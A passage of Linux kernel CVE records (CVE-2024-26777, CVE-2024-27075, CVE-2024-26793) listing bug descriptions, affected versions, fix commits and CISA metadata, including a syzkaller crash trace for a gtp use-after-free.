                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.211",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.150",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.80",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.19",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.7",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfbdev: sis: Error out if pixclock equals zero\n\nThe userspace program could pass any values to the driver through\nioctl() interface. If the driver doesn\u0027t check the value of pixclock,\nit may cause divide-by-zero error.\n\nIn sisfb_check_var(), var-\u003epixclock is used as a divisor to caculate\ndrate before it is checked against zero. Fix this by checking it\nat the beginning.\n\nThis is similar to CVE-2022-3061 in i740fb which was fixed by\ncommit 15cf0b8."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:34:31.212Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/84246c35ca34207114055a87552a1c4289c8fd7e"
        },
        {
          "url": "https://git.kernel.org/stable/c/6db07619d173765bd8622d63809cbfe361f04207"
        },
        {
          "url": "https://git.kernel.org/stable/c/cd36da760bd1f78c63c7078407baf01dd724f313"
        },
        {
          "url": "https://git.kernel.org/stable/c/df6e2088c6f4cad539cf67cba2d6764461e798d1"
        },
        {
          "url": "https://git.kernel.org/stable/c/f329523f6a65c3bbce913ad35473d83a319d5d99"
        },
        {
          "url": "https://git.kernel.org/stable/c/99f1abc34a6dde248d2219d64aa493c76bbdd9eb"
        },
        {
          "url": "https://git.kernel.org/stable/c/1d11dd3ea5d039c7da089f309f39c4cd363b924b"
        },
        {
          "url": "https://git.kernel.org/stable/c/e421946be7d9bf545147bea8419ef8239cb7ca52"
        }
      ],
      "title": "fbdev: sis: Error out if pixclock equals zero",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26777",
    "datePublished": "2024-04-03T17:01:02.935Z",
    "dateReserved": "2024-02-19T14:20:24.177Z",
    "dateUpdated": "2026-01-05T10:34:31.212Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-27075 (GCVE-0-2024-27075)

Vulnerability from cvelistv5 – Published: 2024-05-01 13:04 – Updated: 2025-05-04 12:55

Title

media: dvb-frontends: avoid stack overflow warnings with clang

Summary

In the Linux kernel, the following vulnerability has been resolved: media: dvb-frontends: avoid stack overflow warnings with clang A previous patch worked around a KASAN issue in stv0367, now a similar problem showed up with clang: drivers/media/dvb-frontends/stv0367.c:1222:12: error: stack frame size (3624) exceeds limit (2048) in 'stv0367ter_set_frontend' [-Werror,-Wframe-larger-than] 1214 | static int stv0367ter_set_frontend(struct dvb_frontend *fe) Rework the stv0367_writereg() function to be simpler and mark both register access functions as noinline_for_stack so the temporary i2c_msg structures do not get duplicated on the stack when KASAN_STACK is enabled.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/c073c8cede5abd383…
	https://git.kernel.org/stable/c/fa8b472952ef46eb6…
	https://git.kernel.org/stable/c/fb07104a02e87c06c…
	https://git.kernel.org/stable/c/d20b64f156de5d104…
	https://git.kernel.org/stable/c/107052a8cfeff3a97…
	https://git.kernel.org/stable/c/8fad9c5bb00d3a950…
	https://git.kernel.org/stable/c/d6b4895197ab5a47c…
	https://git.kernel.org/stable/c/ed514ecf4f29c80a2…
	https://git.kernel.org/stable/c/7a4cf27d1f0538f77…

Impacted products

Vendor

Product

Version

Linux

Affected: 3cd890dbe2a4f14cc44c85bb6cf37e5e22d4dd0e , < c073c8cede5abd3836e83d70d72606d11d0759d4 (git)
Affected: 3cd890dbe2a4f14cc44c85bb6cf37e5e22d4dd0e , < fa8b472952ef46eb632825051078c21ce0cafe55 (git)
Affected: 3cd890dbe2a4f14cc44c85bb6cf37e5e22d4dd0e , < fb07104a02e87c06c39914d13ed67fd8f839ca82 (git)
Affected: 3cd890dbe2a4f14cc44c85bb6cf37e5e22d4dd0e , < d20b64f156de5d10410963fe238d82a4e7e97a2f (git)
Affected: 3cd890dbe2a4f14cc44c85bb6cf37e5e22d4dd0e , < 107052a8cfeff3a97326277192b4f052e4860a8a (git)
Affected: 3cd890dbe2a4f14cc44c85bb6cf37e5e22d4dd0e , < 8fad9c5bb00d3a9508d18bbfe832e33a47377730 (git)
Affected: 3cd890dbe2a4f14cc44c85bb6cf37e5e22d4dd0e , < d6b4895197ab5a47cb81c6852d49320b05052960 (git)
Affected: 3cd890dbe2a4f14cc44c85bb6cf37e5e22d4dd0e , < ed514ecf4f29c80a2f09ae3c877059b401efe893 (git)
Affected: 3cd890dbe2a4f14cc44c85bb6cf37e5e22d4dd0e , < 7a4cf27d1f0538f779bf31b8c99eda394e277119 (git)
Affected: dc4bc70259daba144f799e40a99413a86c601006 (git)
Affected: d1d85ae79d5e5592dccba6890658c0999b864ddc (git)
Affected: ad91b2e392be4339e09eefd8479675b4232ddfa1 (git)
Affected: ec1eeaf5b6c12b561d9a90588987e44a2e2f8b1a (git)

Linux

Affected: 4.16
Unaffected: 0 , < 4.16 (semver)
Unaffected: 4.19.311 , ≤ 4.19.* (semver)
Unaffected: 5.4.273 , ≤ 5.4.* (semver)
Unaffected: 5.10.214 , ≤ 5.10.* (semver)
Unaffected: 5.15.153 , ≤ 5.15.* (semver)
Unaffected: 6.1.83 , ≤ 6.1.* (semver)
Unaffected: 6.6.23 , ≤ 6.6.* (semver)
Unaffected: 6.7.11 , ≤ 6.7.* (semver)
Unaffected: 6.8.2 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-27075",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-18T19:39:34.512362Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-18T19:39:53.100Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:27:57.815Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c073c8cede5abd3836e83d70d72606d11d0759d4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fa8b472952ef46eb632825051078c21ce0cafe55"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fb07104a02e87c06c39914d13ed67fd8f839ca82"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d20b64f156de5d10410963fe238d82a4e7e97a2f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/107052a8cfeff3a97326277192b4f052e4860a8a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8fad9c5bb00d3a9508d18bbfe832e33a47377730"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d6b4895197ab5a47cb81c6852d49320b05052960"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ed514ecf4f29c80a2f09ae3c877059b401efe893"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7a4cf27d1f0538f779bf31b8c99eda394e277119"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/media/dvb-frontends/stv0367.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "c073c8cede5abd3836e83d70d72606d11d0759d4",
              "status": "affected",
              "version": "3cd890dbe2a4f14cc44c85bb6cf37e5e22d4dd0e",
              "versionType": "git"
            },
            {
              "lessThan": "fa8b472952ef46eb632825051078c21ce0cafe55",
              "status": "affected",
              "version": "3cd890dbe2a4f14cc44c85bb6cf37e5e22d4dd0e",
              "versionType": "git"
            },
            {
              "lessThan": "fb07104a02e87c06c39914d13ed67fd8f839ca82",
              "status": "affected",
              "version": "3cd890dbe2a4f14cc44c85bb6cf37e5e22d4dd0e",
              "versionType": "git"
            },
            {
              "lessThan": "d20b64f156de5d10410963fe238d82a4e7e97a2f",
              "status": "affected",
              "version": "3cd890dbe2a4f14cc44c85bb6cf37e5e22d4dd0e",
              "versionType": "git"
            },
            {
              "lessThan": "107052a8cfeff3a97326277192b4f052e4860a8a",
              "status": "affected",
              "version": "3cd890dbe2a4f14cc44c85bb6cf37e5e22d4dd0e",
              "versionType": "git"
            },
            {
              "lessThan": "8fad9c5bb00d3a9508d18bbfe832e33a47377730",
              "status": "affected",
              "version": "3cd890dbe2a4f14cc44c85bb6cf37e5e22d4dd0e",
              "versionType": "git"
            },
            {
              "lessThan": "d6b4895197ab5a47cb81c6852d49320b05052960",
              "status": "affected",
              "version": "3cd890dbe2a4f14cc44c85bb6cf37e5e22d4dd0e",
              "versionType": "git"
            },
            {
              "lessThan": "ed514ecf4f29c80a2f09ae3c877059b401efe893",
              "status": "affected",
              "version": "3cd890dbe2a4f14cc44c85bb6cf37e5e22d4dd0e",
              "versionType": "git"
            },
            {
              "lessThan": "7a4cf27d1f0538f779bf31b8c99eda394e277119",
              "status": "affected",
              "version": "3cd890dbe2a4f14cc44c85bb6cf37e5e22d4dd0e",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "dc4bc70259daba144f799e40a99413a86c601006",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "d1d85ae79d5e5592dccba6890658c0999b864ddc",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "ad91b2e392be4339e09eefd8479675b4232ddfa1",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "ec1eeaf5b6c12b561d9a90588987e44a2e2f8b1a",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/media/dvb-frontends/stv0367.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.16"
            },
            {
              "lessThan": "4.16",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.311",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.273",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.214",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.153",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.83",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.23",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.11",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.2",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.311",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.273",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.214",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.153",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.83",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.23",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.11",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.2",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "4.4.168",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "4.9.82",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "4.14.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "4.15.4",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: dvb-frontends: avoid stack overflow warnings with clang\n\nA previous patch worked around a KASAN issue in stv0367, now a similar\nproblem showed up with clang:\n\ndrivers/media/dvb-frontends/stv0367.c:1222:12: error: stack frame size (3624) exceeds limit (2048) in \u0027stv0367ter_set_frontend\u0027 [-Werror,-Wframe-larger-than]\n 1214 | static int stv0367ter_set_frontend(struct dvb_frontend *fe)\n\nRework the stv0367_writereg() function to be simpler and mark both\nregister access functions as noinline_for_stack so the temporary\ni2c_msg structures do not get duplicated on the stack when KASAN_STACK\nis enabled."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:55:28.632Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/c073c8cede5abd3836e83d70d72606d11d0759d4"
        },
        {
          "url": "https://git.kernel.org/stable/c/fa8b472952ef46eb632825051078c21ce0cafe55"
        },
        {
          "url": "https://git.kernel.org/stable/c/fb07104a02e87c06c39914d13ed67fd8f839ca82"
        },
        {
          "url": "https://git.kernel.org/stable/c/d20b64f156de5d10410963fe238d82a4e7e97a2f"
        },
        {
          "url": "https://git.kernel.org/stable/c/107052a8cfeff3a97326277192b4f052e4860a8a"
        },
        {
          "url": "https://git.kernel.org/stable/c/8fad9c5bb00d3a9508d18bbfe832e33a47377730"
        },
        {
          "url": "https://git.kernel.org/stable/c/d6b4895197ab5a47cb81c6852d49320b05052960"
        },
        {
          "url": "https://git.kernel.org/stable/c/ed514ecf4f29c80a2f09ae3c877059b401efe893"
        },
        {
          "url": "https://git.kernel.org/stable/c/7a4cf27d1f0538f779bf31b8c99eda394e277119"
        }
      ],
      "title": "media: dvb-frontends: avoid stack overflow warnings with clang",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-27075",
    "datePublished": "2024-05-01T13:04:44.494Z",
    "dateReserved": "2024-02-19T14:20:24.217Z",
    "dateUpdated": "2025-05-04T12:55:28.632Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26793 (GCVE-0-2024-26793)

Vulnerability from cvelistv5 – Published: 2024-04-04 08:20 – Updated: 2025-05-04 08:56

Title

gtp: fix use-after-free and null-ptr-deref in gtp_newlink()

Summary

In the Linux kernel, the following vulnerability has been resolved: gtp: fix use-after-free and null-ptr-deref in gtp_newlink() The gtp_link_ops operations structure for the subsystem must be registered after registering the gtp_net_ops pernet operations structure. Syzkaller hit 'general protection fault in gtp_genl_dump_pdp' bug: [ 1010.702740] gtp: GTP module unloaded [ 1010.715877] general protection fault, probably for non-canonical address 0xdffffc0000000001: 0000 [#1] SMP KASAN NOPTI [ 1010.715888] KASAN: null-ptr-deref in range [0x0000000000000008-0x000000000000000f] [ 1010.715895] CPU: 1 PID: 128616 Comm: a.out Not tainted 6.8.0-rc6-std-def-alt1 #1 [ 1010.715899] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.0-alt1 04/01/2014 [ 1010.715908] RIP: 0010:gtp_newlink+0x4d7/0x9c0 [gtp] [ 1010.715915] Code: 80 3c 02 00 0f 85 41 04 00 00 48 8b bb d8 05 00 00 e8 ed f6 ff ff 48 89 c2 48 89 c5 48 b8 00 00 00 00 00 fc ff df 48 c1 ea 03 <80> 3c 02 00 0f 85 4f 04 00 00 4c 89 e2 4c 8b 6d 00 48 b8 00 00 00 [ 1010.715920] RSP: 0018:ffff888020fbf180 EFLAGS: 00010203 [ 1010.715929] RAX: dffffc0000000000 RBX: ffff88800399c000 RCX: 0000000000000000 [ 1010.715933] RDX: 0000000000000001 RSI: ffffffff84805280 RDI: 0000000000000282 [ 1010.715938] RBP: 000000000000000d R08: 0000000000000001 R09: 0000000000000000 [ 1010.715942] R10: 0000000000000001 R11: 0000000000000001 R12: ffff88800399cc80 [ 1010.715947] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000400 [ 1010.715953] FS: 00007fd1509ab5c0(0000) GS:ffff88805b300000(0000) knlGS:0000000000000000 [ 1010.715958] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 1010.715962] CR2: 0000000000000000 CR3: 000000001c07a000 CR4: 0000000000750ee0 [ 1010.715968] PKRU: 55555554 [ 1010.715972] Call Trace: [ 1010.715985] ? __die_body.cold+0x1a/0x1f [ 1010.715995] ? die_addr+0x43/0x70 [ 1010.716002] ? exc_general_protection+0x199/0x2f0 [ 1010.716016] ? asm_exc_general_protection+0x1e/0x30 [ 1010.716026] ? gtp_newlink+0x4d7/0x9c0 [gtp] [ 1010.716034] ? gtp_net_exit+0x150/0x150 [gtp] [ 1010.716042] __rtnl_newlink+0x1063/0x1700 [ 1010.716051] ? rtnl_setlink+0x3c0/0x3c0 [ 1010.716063] ? is_bpf_text_address+0xc0/0x1f0 [ 1010.716070] ? kernel_text_address.part.0+0xbb/0xd0 [ 1010.716076] ? __kernel_text_address+0x56/0xa0 [ 1010.716084] ? unwind_get_return_address+0x5a/0xa0 [ 1010.716091] ? create_prof_cpu_mask+0x30/0x30 [ 1010.716098] ? arch_stack_walk+0x9e/0xf0 [ 1010.716106] ? stack_trace_save+0x91/0xd0 [ 1010.716113] ? stack_trace_consume_entry+0x170/0x170 [ 1010.716121] ? __lock_acquire+0x15c5/0x5380 [ 1010.716139] ? mark_held_locks+0x9e/0xe0 [ 1010.716148] ? kmem_cache_alloc_trace+0x35f/0x3c0 [ 1010.716155] ? __rtnl_newlink+0x1700/0x1700 [ 1010.716160] rtnl_newlink+0x69/0xa0 [ 1010.716166] rtnetlink_rcv_msg+0x43b/0xc50 [ 1010.716172] ? rtnl_fdb_dump+0x9f0/0x9f0 [ 1010.716179] ? lock_acquire+0x1fe/0x560 [ 1010.716188] ? netlink_deliver_tap+0x12f/0xd50 [ 1010.716196] netlink_rcv_skb+0x14d/0x440 [ 1010.716202] ? rtnl_fdb_dump+0x9f0/0x9f0 [ 1010.716208] ? netlink_ack+0xab0/0xab0 [ 1010.716213] ? netlink_deliver_tap+0x202/0xd50 [ 1010.716220] ? netlink_deliver_tap+0x218/0xd50 [ 1010.716226] ? __virt_addr_valid+0x30b/0x590 [ 1010.716233] netlink_unicast+0x54b/0x800 [ 1010.716240] ? netlink_attachskb+0x870/0x870 [ 1010.716248] ? __check_object_size+0x2de/0x3b0 [ 1010.716254] netlink_sendmsg+0x938/0xe40 [ 1010.716261] ? netlink_unicast+0x800/0x800 [ 1010.716269] ? __import_iovec+0x292/0x510 [ 1010.716276] ? netlink_unicast+0x800/0x800 [ 1010.716284] __sock_sendmsg+0x159/0x190 [ 1010.716290] ____sys_sendmsg+0x712/0x880 [ 1010.716297] ? sock_write_iter+0x3d0/0x3d0 [ 1010.716304] ? __ia32_sys_recvmmsg+0x270/0x270 [ 1010.716309] ? lock_acquire+0x1fe/0x560 [ 1010.716315] ? drain_array_locked+0x90/0x90 [ 1010.716324] ___sys_sendmsg+0xf8/0x170 [ 1010.716331] ? sendmsg_copy_msghdr+0x170/0x170 [ 1010.716337] ? lockdep_init_map ---truncated---

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/01129059d5141d62f…
	https://git.kernel.org/stable/c/ec92aa2cab6f0048f…
	https://git.kernel.org/stable/c/e668b92a3a0142992…
	https://git.kernel.org/stable/c/9376d059a705c5dfa…
	https://git.kernel.org/stable/c/abd32d7f5c0294c1b…
	https://git.kernel.org/stable/c/93dd420bc41531c9a…
	https://git.kernel.org/stable/c/5366969a19a8a0d2f…
	https://git.kernel.org/stable/c/616d82c3cfa2a2146…

Impacted products

Vendor

Product

Version

Linux

Affected: 459aa660eb1d8ce67080da1983bb81d716aa5a69 , < 01129059d5141d62fae692f7a336ae3bc712d3eb (git)
Affected: 459aa660eb1d8ce67080da1983bb81d716aa5a69 , < ec92aa2cab6f0048f10d6aa4f025c5885cb1a1b6 (git)
Affected: 459aa660eb1d8ce67080da1983bb81d716aa5a69 , < e668b92a3a01429923fd5ca13e99642aab47de69 (git)
Affected: 459aa660eb1d8ce67080da1983bb81d716aa5a69 , < 9376d059a705c5dfaac566c2d09891242013ae16 (git)
Affected: 459aa660eb1d8ce67080da1983bb81d716aa5a69 , < abd32d7f5c0294c1b2454c5a3b13b18446bac627 (git)
Affected: 459aa660eb1d8ce67080da1983bb81d716aa5a69 , < 93dd420bc41531c9a31498b9538ca83ba6ec191e (git)
Affected: 459aa660eb1d8ce67080da1983bb81d716aa5a69 , < 5366969a19a8a0d2ffb3d27ef6e8905e5e4216f8 (git)
Affected: 459aa660eb1d8ce67080da1983bb81d716aa5a69 , < 616d82c3cfa2a2146dd7e3ae47bda7e877ee549e (git)

Linux

Affected: 4.7
Unaffected: 0 , < 4.7 (semver)
Unaffected: 4.19.309 , ≤ 4.19.* (semver)
Unaffected: 5.4.271 , ≤ 5.4.* (semver)
Unaffected: 5.10.212 , ≤ 5.10.* (semver)
Unaffected: 5.15.151 , ≤ 5.15.* (semver)
Unaffected: 6.1.81 , ≤ 6.1.* (semver)
Unaffected: 6.6.21 , ≤ 6.6.* (semver)
Unaffected: 6.7.9 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:14:13.475Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/01129059d5141d62fae692f7a336ae3bc712d3eb"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ec92aa2cab6f0048f10d6aa4f025c5885cb1a1b6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e668b92a3a01429923fd5ca13e99642aab47de69"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9376d059a705c5dfaac566c2d09891242013ae16"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/abd32d7f5c0294c1b2454c5a3b13b18446bac627"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/93dd420bc41531c9a31498b9538ca83ba6ec191e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5366969a19a8a0d2ffb3d27ef6e8905e5e4216f8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/616d82c3cfa2a2146dd7e3ae47bda7e877ee549e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26793",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:50:52.672497Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:48.724Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/gtp.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "01129059d5141d62fae692f7a336ae3bc712d3eb",
              "status": "affected",
              "version": "459aa660eb1d8ce67080da1983bb81d716aa5a69",
              "versionType": "git"
            },
            {
              "lessThan": "ec92aa2cab6f0048f10d6aa4f025c5885cb1a1b6",
              "status": "affected",
              "version": "459aa660eb1d8ce67080da1983bb81d716aa5a69",
              "versionType": "git"
            },
            {
              "lessThan": "e668b92a3a01429923fd5ca13e99642aab47de69",
              "status": "affected",
              "version": "459aa660eb1d8ce67080da1983bb81d716aa5a69",
              "versionType": "git"
            },
            {
              "lessThan": "9376d059a705c5dfaac566c2d09891242013ae16",
              "status": "affected",
              "version": "459aa660eb1d8ce67080da1983bb81d716aa5a69",
              "versionType": "git"
            },
            {
              "lessThan": "abd32d7f5c0294c1b2454c5a3b13b18446bac627",
              "status": "affected",
              "version": "459aa660eb1d8ce67080da1983bb81d716aa5a69",
              "versionType": "git"
            },
            {
              "lessThan": "93dd420bc41531c9a31498b9538ca83ba6ec191e",
              "status": "affected",
              "version": "459aa660eb1d8ce67080da1983bb81d716aa5a69",
              "versionType": "git"
            },
            {
              "lessThan": "5366969a19a8a0d2ffb3d27ef6e8905e5e4216f8",
              "status": "affected",
              "version": "459aa660eb1d8ce67080da1983bb81d716aa5a69",
              "versionType": "git"
            },
            {
              "lessThan": "616d82c3cfa2a2146dd7e3ae47bda7e877ee549e",
              "status": "affected",
              "version": "459aa660eb1d8ce67080da1983bb81d716aa5a69",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/gtp.c"
